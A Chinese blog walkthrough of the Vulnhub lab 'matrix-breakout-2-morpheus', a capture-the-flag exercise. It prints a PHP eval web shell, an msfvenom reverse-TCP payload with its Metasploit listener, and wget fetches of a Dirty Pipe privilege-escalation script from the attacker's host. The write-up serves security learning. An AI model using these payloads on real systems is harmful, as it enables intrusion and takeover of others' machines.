matrix-breakout-2-morpheus靶场

最新推荐文章于 2024-07-21 16:17:32 发布
最新推荐文章于 2024-07-21 16:17:32 发布
阅读量592 收藏 16
点赞数 23
分类专栏: vulnhub靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45653478/article/details/140100907
版权

1 信息收集

1.1 主机发现

arp-scan -l

1.2 端口与服务扫描

发现开放22、80、81端口

2 访问服务

2.1 访问80端口

查看源代码

2.2 访问81端口

3 目录扫描

3.1 dirsearch目录扫描

dirsearch -u 192.168.1.14

发现robots.txt文件和javascript文件

访问文件

http://192.168.1.14/robots.txt

robot.txt提示我们继续找找

http://192.168.1.14/javascript/

3.2 gobuster扫描

还是将重点放回80端口,因为robot.txt提示我们继续找找,可能是因为我们的字典太小了,我们换个扫描器换个字典试下,利用kali自带的最大的一个字典。

gobuster的效率相比于dirsearch来说更快,当字典过大的时候选择gobuster是一个不错的选择。

gobuster dir -u http://192.168.1.14/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

通过gobuster扫描了一个几十万的字典,我们可以看到有一个graffiti.php。这个可能就是关键点,尝试访问web页面。

http://192.168.1.14/graffiti.php

4 渗透测试

4.1 抓包尝试

尝试输入1提交,并打开burp抓包啊查看,发现网站会将提交的内容追加到graffiti.txt文件中。

此时猜想该POST数据中的filename参数是否可控,因为内容是可控的,只要文件名可控,那么我们就可以轻易进行文件上传了。尝试保存为shell.php,点击send。

发现可以成功访问,接下来直接上传一句话木马。

   <?php @eval($_POST['cmd']); ?>

成功连接蚁剑执行命令发现为www-data权限。

5 提权

5.1 利用MSF工具生成反弹连接

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.52 lport=4444 -o shell4.php

开启简易HTTP服务

python3 -m http.server

利用靶机下载反弹连接文件

攻击机开启MSF监听

use exploit/multi/handler 
set lhost 192.168.1.52 
set payload php/meterpreter/reverse_tcp
set lport 4444
show options
run

访问反弹连接文件

MSF反弹连接成功监听

5.2 利用脚本搜集漏洞

利用交互式Shell进入

python3 -c 'import pty;pty.spawn("/bin/bash")'

脚本地址:https://github.com/The-Z-Labs/linux-exploit-suggester

下载脚本

wget 192.168.1.52:8000/linux-exploit-suggester.sh

查看脚本权限,并且给脚本赋可执行权

ls -al
chmod +x linux-exploit-suggester

开测

./linux-exploit-suggester.sh

5.3 利用CVE漏洞提权

github上找到exp

https://github.com/r1is/CVE-2022-0847

让靶机下载

wget 192.168.1.52:8000/Dirty-Pipe.sh

给脚本赋可执行权并执行脚本

chmod +x Dirty-Pipe.sh
./Dirty-Pipe.sh
whoami

乐队1
关注
  • 23
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2d-breakout
03-14
在2D游戏开发中,JavaScript可以处理用户的输入、游戏逻辑、碰撞检测以及动画效果,使得游戏运行在浏览器上成为可能。 在2D-Breakout游戏开发中,我们首先需要建立游戏的基本框架。这包括定义游戏的主循环,这个...
Pantsu-Breakout-Game:Phaser网络游戏
02-05
Pantsu突破游戏 移相器网页游戏 您可以在上播放最新的最低可行产品,或者在上播放最新版本... 因此,由于我不想重构当前编写的所有内容,因此我将停止Pantsu Breakout Game的开发,而将其保留在最低可行的产品编号5上。
Vulnhub靶场matrix-breakout-2-morpheus
qq_69775412的博客
10-17 595
简介: vulnhub是一个提供靶场环境的平台。今天从首页下载了一个来做,它叫matrix-breakout-2-morpheus
vulnhub靶场Matrix-Breakout 2 Morpheus
qq_58091216的博客
01-31 1327
我们找到了Flag 1!,提示我们从80端口的Web服务器中提取此图像以获得另外一个flag,图像的名称叫/.cypher-neo.png,可以看到是一个隐藏文件。蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)此处有一个file变量,那么改变file变量可以直接对靶机文件修改,能随意创建文件,二话不说写个马,准备反弹shell。截止到目前,我们没有找到任何有用的信息,我们可以换一个思路进行。
Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS
weixin_43902100的博客
03-14 424
81端口后直接弹出来一个登录框,尝试输入东西后让重新输入,前端代码也无法打开,尝试使用bp抓包看看会不会有什么注入点。下载地址:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/CVE-2022-0847脚本地址:https://github.com/r1is/CVE-2022-0847。然后再访问反弹shell的文件,我把它命名为1.php,访问后就反弹过来了。访问graffiti.php果然出界面了,还有一个输入框。
vulnhub靶场Matrix-Breakout 2 Morpheus教程
xnxqwzy的博客
02-25 1743
靶场搭建直接解压双击ova文件即可使用软件:VMware(可能会出现问题),(此处官方建议使用VirtualBox)难度:中等攻击机:kali* 信息收集为了方便我直接使用windows上的lansee直接扫描出目标靶机ip!lansee扫描结果去除已知靶机ip剩下的就是目标靶机当然需要访问看看!访问结果看看源码能出现啥!192.168.21.134网页主页源码没有什么有用的看看nmap能看出来啥!nmap简单扫描结果看看端口详细信息!nmap扫描到的详细信息。
2d-breakout-game
05-11
在2D Breakout游戏中,屏幕顶部排列有一层砖块,目标是将它们全部摧毁。 球直接在屏幕周围移动,从屏幕的顶部和两侧弹起。 击打砖块时,球会弹回,砖块将被破坏。 当球碰到屏幕底部时,玩家失去转弯; 为了防止发生...
infinite-breakout-ds:Nintendo DS 的 Infinite Breakout 克隆版。 支持台东桨控制器
06-14
Nintendo DS 的一个非常简单的 Breakout 克隆。 支持台东桨控制器。 要进行编译,您需要下载并安装最新版本的 libnds homebrew 库,它是 DevkitPro 的一部分。 标题画面是使用这个工具制作的: :
提升无线网络安全:用Python脚本发现并修复WiFi安全问题
m0_68483928的博客
07-17 464
文章详细介绍了如何使用Python脚本和一些强大的开源工具来捕获和测试WPA/WPA2握手。通过上述步骤,您可以在本地测试WiFi密码的安全性,并了解其潜在的漏洞。最后,选择指定密码本进行爆破(我这里的是从网络上收集的,大家可以自行去收集,或者评论或私信我获取)在本文中,我们将介绍并展示如何使用Python脚本来破解WiFi密码。首先,它会验证路由器的MAC地址(BSSID)是否格式正确,例如00:77:88:33:44:55。工具,通过提供的单词表文件来获取密码。·命令查看路由器的网卡地址,并输入。
web安全之跨站脚本攻击xss
奔跑的小猪仔
07-17 982
xss 跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意js代码,当用户浏览该页之时,嵌入其中web里面的js代码会被执行,从而达到恶意的特殊目的。
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 1176
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
2024年对网络安全专业的观点解析
goodxianping的专栏
07-17 540
网络安全专业的毕业生能够适应多个行业和岗位,包括但不限于政府部门、金融机构、大型互联网公司、电信运营商、科研机构的安全团队。学历较低、经验不足的大量初级从业人员与企业的需求不匹配,一方面找工作难,一方面企业招聘不到合适的安全人员,导致供需矛盾。在网络安全领域,学历并非衡量一个人能力的唯一标准,但普遍较低的学历水平确实反映了行业人才结构的某些问题。张雪峰对网络安全专业的看法是积极和乐观的。随着信息时代的到来,各类企业和组织对网络安全的需求越来越大,使得该专业的毕业生在市场上拥有很大的需求量。
网络安全----web安全防范
weixin_55357256的博客
07-16 694
以下代码用来防范流行的DDoS攻击,ARP欺骗,CC攻击,XXS攻击,对输入的恶意代码进行过滤,嵌入到web程序可以很好的防范网络攻击,但如果想要更好的防范网络攻击,还需要更加复杂的配置和更硬核的硬件。print(f"可能的 CC 攻击针对资源 {resource} 检测到")# 用于检测 CC 攻击的函数(简单示例,通过监测短时间内对同一资源的请求频率)# 用于检测 XSS 攻击的函数(简单示例,检查输入中是否存在可疑脚本标签)# 用于检测 DDoS 攻击的函数(简单示例,通过监测短时间内的连接数量)
黑龙江网络安全等级保护测评策略概述
waitaikong_的博客
07-21 290
黑龙江省网络安全等级保护测评策略是为了保障信息系统安全稳定运行,根据《网络安全法》和相关国家标准制定的综合性安全评估和加固过程。该策略不仅要求企业和机构明确自身信息系统的安全等级,还指导其实施相应的技术防护与管理措施,确保数据的保密性、完整性和可用性。
【网络安全】PostMessage:分析JS实现XSS
等风来
07-17 849
PostMessage是一个用于在网页间安全地发送消息的浏览器 API。它允许不同的窗口(例如,来自同一域名下的不同页面或者不同域名下的跨域页面)进行通信,而无需通过服务器。通常情况下,它用于实现跨文档消息传递(Cross-Document Messaging),这在一些复杂的网页应用和浏览器插件中非常有用。
网络安全防线:黑龙江等级保护测评标准详解
waitaikong_的博客
07-21 337
黑龙江等保测评,即信息安全等级保护测评,是指网络系统运营、使用单位委托具有等级保护测评资质的测评机构,按照有关管理规范和技术标准,对处理特定应用的网络和信息系统进行安全技术测评和安全管理测评,以判断受测系统的技术和管理级别与所定安全等级要求的符合程度,并针对安全不符合项提出安全整改建议。
网络安全入门教程(非常详细)从零基础入门到精通_网路安全 教程
2401_85023708的博客
07-21 812
1.入行网络安全这是一条坚持的道路,三分钟的热情可以放弃往下看了。2.多练多想,不要离开了教程什么都不会了,最好看完教程自己独立完成技术方面的开发。3.有时多百度,我们往往都遇不到好心的大神,谁会无聊天天给你做解答。4.遇到实在搞不懂的,可以先放放,以后再来解决。先科普划分一下级别(全部按小白基础,会写个表格word就行的这种)**1级:脚本小子;难度:无,**达到“黑客新闻”的部分水准(一分钱买iphone、黑掉母校官网挂女神照片什么的)**2级:网络安全工程师;
网络安全新视角:2024年威胁 landscape与防护策略
最新发布
waitaikong_的博客
07-21 130
同时,人工智能在网络安全中的作用不容忽视,它不仅提升了安全防御能力,也带来了新的挑战和道德考量。2024年网络安全法律框架经历了修订,对企业网络安全责任制度提出了新的要求,强调了关键信息基础设施的保护,调整了网络信息安全法律责任,更新了个人信息保护的法律责任。与传统防火墙相比,NGFW在功能、性能和灵活性方面具有显著优势,如能够实现对应用层的深度检测和防护,提供基于会话和流的策略管理,以及支持多种部署方式。5G网络的推出不仅改变了连接性,也提出了新的安全挑战,如增强的加密和低延迟通信需求。
vulnhub靶场 breakout
08-29
EMPIRE: BREAKOUT是一个在VulnHub网站上提供的虚拟机靶场。你可以在VulnHub网站上搜索EMPIRE: BREAKOUT,并下载该靶场进行学习和实践。 VulnHub是一个提供各种虚拟机靶场的网站,旨在帮助人们学习和提升网络安全技能。在这个靶场中,你可以接触到加密方式和解密过程,对于第一次接触这种加密方式的人来说,可以使用在线站点来进行解密操作,提高对该加密方式的理解和熟悉度。 EMPIRE: BREAKOUT靶场是一个适合初学者的简单难度的靶场,对于计算机学习者来说,初期的学习往往是最迷茫和难以坚持的,但通过不断的学习和实践,经验和能力会得到提高。这个靶场可以帮助你探索和学习网络安全方面的知识和技能。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【VulnHub靶场】——EMPIRE: BREAKOUT](https://blog.csdn.net/qq_63844103/article/details/127028486)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值